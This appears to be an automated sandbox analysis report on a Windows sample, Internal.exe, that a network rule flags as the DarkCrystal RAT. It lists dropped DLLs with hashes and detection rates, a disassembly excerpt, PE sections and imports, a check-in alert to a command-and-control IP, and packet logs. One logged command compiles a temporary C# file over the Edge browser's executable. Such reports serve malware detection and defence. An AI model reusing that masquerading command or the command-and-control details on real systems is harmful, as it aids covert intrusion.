                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.0.cs"
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):758
                                    Entropy (8bit):5.252964305328497
                                    Encrypted:false
                                    SSDEEP:12:T0I/u7L//TRRzscQDZspKbuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AI/un/VRzstDeKax5DqBVKVrdFAMBJTH
                                    MD5:EEAFFF5A5B7B7FD3E564B5F44E5D4C66
                                    SHA1:FF89B9543850A0A270AAC62EF2CA85CB186D8331
                                    SHA-256:7DDA30D60609894DE2CCE4AF2726D107120743A7255AE8E8A02F0A34E27D9292
                                    SHA-512:25C5EB6A457C37C5BA6B304270EADD8E7F868F64059A793DFF28A1003FBFD33C678068DB09B127D2DFA45BC95CFA9E467F26A53A57C8B1A3F381DA34B444598E
                                    Malicious:false
                                    Preview:.C:\Blockcomcrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1209886597424439
                                    Encrypted:false
                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    • Antivirus: Virustotal, Detection: 11%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    • Antivirus: Virustotal, Detection: 11%, Browse
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    • Antivirus: Virustotal, Detection: 29%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    • Antivirus: Virustotal, Detection: 27%, Browse
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    • Antivirus: Virustotal, Detection: 27%, Browse
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    • Antivirus: Virustotal, Detection: 22%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    • Antivirus: Virustotal, Detection: 29%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    • Antivirus: Virustotal, Detection: 22%, Browse
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    • Antivirus: Virustotal, Detection: 69%
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1224
                                    Entropy (8bit):4.435108676655666
                                    Encrypted:false
                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                    Malicious:false
                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.9755903687939225
                                    Encrypted:false
                                    SSDEEP:48:6JpLPtyM7Jt8Bs3FJsdcV4MKe27VdfJ3ovqBHuOulajfqXSfbNtm:UPxPc+Vx9MZovkIcjRzNt
                                    MD5:0EEC62A56D9CD1EB2DDF39107AD16A82
                                    SHA1:A7EBDCE55F8D56A45D6B90E78D48985724CD5537
                                    SHA-256:E69D42DFC007CD53AC663AE379089B550D4CEDA7D77499AD0A9DF37331EE8D60
                                    SHA-512:666571F7C698CB0AB1D8CB7D3E93A45804F04F29BB8A06B49A355A0F2E3CF9BB6FFED1D8F9587F23C8570763E8328941FCE1112CD052D5D3582EDDA87EF5172C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Process:C:\Windows\System32\w32tm.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):151
                                    Entropy (8bit):4.785950200435612
                                    Encrypted:false
                                    SSDEEP:3:VLV993J+miJWEoJ8FX7IFBRP4qNvoU28aNvj:Vx993DEURDP4VU288
                                    MD5:5A6A02F0577429DEB77C06C92EC56E70
                                    SHA1:4D4C5B4DCF91E14DBD905113F7634CD09F125513
                                    SHA-256:F50615D49A55EB2FF22F6C4D6FA78E3AD0E673626731CEBCFD2412F99265BE68
                                    SHA-512:1C4391E5989FED91D6436C719B1090B06C3D97E5D4BB725AB1909481CE316C2DDAB4CA070DF05CFF3B2C061B241842CC1401977BF7BC495D55832C4349302A63
                                    Malicious:false
                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/08/2024 11:02:04..11:02:04, error: 0x80072746.11:02:09, error: 0x80072746.
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.75764350497598
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Internal.exe
                                    File size:3'265'288 bytes
                                    MD5:15e81b6e3999600603d0f8b0dd22c33e
                                    SHA1:8b76e5db4c4344dc6a011310892d026f2ff95906
                                    SHA256:3a809ac2c5f55a839e15387cb84eba8adee8f402fda2736894d797a57b3e2eb1
                                    SHA512:d66610e57ea0138540d414756a8c610e5b38add2dd35f2f1d11cfe1cc5fb320f8a54db4f7a5511cee7187d508c76e62f3e44de17f51fdab0e798dba7202072a4
                                    SSDEEP:98304:FewFpuCoX7qd6lHRQJjZUd4lTpOrGRzHsAgaAYC1AH:copuCoOyHRQJjZUdPrcHsAgaAYC1Q
                                    TLSH:5EE5E11A55918E37C6B0573555E7403D92A0D7323A72EB0B351F60B26803BB6CE72AFB
                                    Icon Hash:1f49c6b2b2b05917
                                    Entrypoint:0x41280c
                                    Entrypoint Section:
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:d89f3dcdac0c8dba11dc1162435bedbb
                                    Instruction
                                    call 00007FACC51907F6h
                                    jmp 00007FACC519060Eh
                                    push 0044BB60h
                                    push dword ptr fs:[00000000h]
                                    mov eax, dword ptr [esp+10h]
                                    mov dword ptr [esp+10h], ebp
                                    lea ebp, dword ptr [esp+10h]
                                    sub esp, eax
                                    push ebx
                                    push esi
                                    push edi
                                    mov eax, dword ptr [00466ECCh]
                                    xor dword ptr [ebp-04h], eax
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-18h], esp
                                    push dword ptr [ebp-08h]
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    int3
                                    int3
                                    int3
                                    add esp, 04h
                                    jmp 00007FACC5557E3Bh
                                    imul esi, dword ptr [eax], 60h
                                    pop eax
                                    loope 00007FACC5190787h
                                    pushad
                                    sbb al, 47h
                                    xor esp, esi
                                    sub al, 44h
                                    rol byte ptr [ebx+ebx*2+7C8AA5F1h], 1
                                    sar dword ptr [eax+esi*4+63CE1A31h], cl
                                    xor eax, C376D8BFh
                                    iretd
                                    add byte ptr [eax-3976CE8Bh], 0000006Ch
                                    cmpsd
                                    or edx, ecx
                                    mov ch, 7Bh
                                    mov seg?, word ptr [eax-5CD7F545h]
                                    mov esi, 2EF69C51h
                                    mov eax, dword ptr [6B4BA75Bh]
                                    mov eax, dword ptr [916A56B0h]
                                    pop esi
                                    mov cl, 52h
                                    mov cl, B2h
                                    js 00007FACC51907E9h
                                    xor ebp, dword ptr [eax-51h]
                                    push esi
                                    cmp al, 86h
                                    or ah, byte ptr [ebx-3B9FECF2h]
                                    add dword ptr [esi], esp
                                    test dword ptr [edx], ecx
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    | Name | Virtual Address | Virtual Size | Is in Section |
                                    | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2f6020 | 0x34 | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f6054 | 0x210 | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x623c | .rsrc |
                                    | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f6000 | 0xc | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |

                                    | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                    |  | 0x1000 | 0x32000 | 0x1be00 | a9b453a74ed788019ab0a332a8e12964 | False | 0.997276135089686 | data | 7.996505494911121 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x33000 | 0xb000 | 0x4800 | 337e3d781169ec2e8f4b8b188b0f6e86 | False | 0.9946831597222222 | data | 7.981611898607139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x3e000 | 0x25000 | 0x800 | 1abab95e3f01f489804d55ce1f765049 | False | 0.9140625 | data | 7.46576892235659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x63000 | 0x1000 | 0x200 | fe5e9b31997ce6e8d69df1a0a87acabd | False | 0.451171875 | data | 3.7297884374243067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x64000 | 0x9000 | 0x2600 | 793558f5393b80d7e873c35081c97c4f | False | 0.9827302631578947 | data | 7.944368858176558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x6d000 | 0x3000 | 0x2000 | a97cfb3eec19321043db03a4f84f9d19 | False | 0.95849609375 | data | 7.8489874697458575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    | .rsrc | 0x70000 | 0x7000 | 0x6400 | c6b070ca22a828adce4bfc8af5b1e330 | False | 0.23203125 | data | 3.024585906681764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x77000 | 0x27f000 | 0x2ba00 | e9b9db4109deec1da109a175be1fab57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    | cheat | 0x2f6000 | 0xe7000 | 0xe6a00 | baaf5a0fd26c880b4cb7a466da2c6fcd | False | 0.9969861534552845 | data | 7.977472810285237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

                                    | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                    | PNG | 0x64524 | 0xb45 | data | English | United States | 1.0038128249566725 |
                                    | PNG | 0x6506c | 0x15a9 | data | English | United States | 0.970130340333092 |
                                    | RT_ICON | 0x70524 | 0x4538 | Device independent bitmap graphic, 65 x 130 x 32, image size 16900, resolution 2835 x 2835 px/m |  |  | 0.1881489841986456 |
                                    | RT_DIALOG | 0x6ab50 | 0x286 | empty | English | United States | 0 |
                                    | RT_DIALOG | 0x6add8 | 0x13a | empty | English | United States | 0 |
                                    | RT_DIALOG | 0x6af14 | 0xec | empty | English | United States | 0 |
                                    | RT_DIALOG | 0x6b000 | 0x12e | empty | English | United States | 0 |
                                    | RT_DIALOG | 0x6b130 | 0x338 | empty | English | United States | 0 |
                                    | RT_DIALOG | 0x6b468 | 0x252 | empty | English | United States | 0 |
                                    | RT_STRING | 0x74a5c | 0x1e2 | data | English | United States | 0.3900414937759336 |
                                    | RT_STRING | 0x74c40 | 0x1cc | data | English | United States | 0.4282608695652174 |
                                    | RT_STRING | 0x74e0c | 0x1b8 | data | English | United States | 0.45681818181818185 |
                                    | RT_STRING | 0x74fc4 | 0x146 | data | English | United States | 0.5153374233128835 |
                                    | RT_STRING | 0x7510c | 0x46c | data | English | United States | 0.3454063604240283 |
                                    | RT_STRING | 0x75578 | 0x166 | data | English | United States | 0.49162011173184356 |
                                    | RT_STRING | 0x756e0 | 0x152 | data | English | United States | 0.5059171597633136 |
                                    | RT_STRING | 0x75834 | 0x10a | data | English | United States | 0.49624060150375937 |
                                    | RT_STRING | 0x75940 | 0xbc | data | English | United States | 0.6329787234042553 |
                                    | RT_STRING | 0x759fc | 0xd6 | data | English | United States | 0.5747663551401869 |
                                    | RT_GROUP_ICON | 0x75ad4 | 0x14 | data |  |  | 1.1 |
                                    | RT_MANIFEST | 0x75ae8 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |

                                    | DLL | Import |
                                    | kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA |
                                    | user32.dll | MessageBoxA |
                                    | advapi32.dll | RegCloseKey |
                                    | oleaut32.dll | SysFreeString |
                                    | gdi32.dll | CreateFontA |
                                    | shell32.dll | ShellExecuteA |
                                    | version.dll | GetFileVersionInfoA |
                                    | gdiplus.dll | GdipAlloc |

                                    | Language of compilation system | Country where language is spoken |
                                    | English | United States |

                                    | Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP |
                                    | 2024-08-25T15:45:44.649080+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49707 | 80 | 192.168.2.8 | 80.211.144.156 |

                                    | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                    Aug 25, 2024 15:45:50.099229097 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.099266052 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.104087114 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.104135990 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.104185104 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.104196072 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.104224920 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.104245901 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.104249954 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.104258060 CEST804971880.211.144.156192.168.2.8
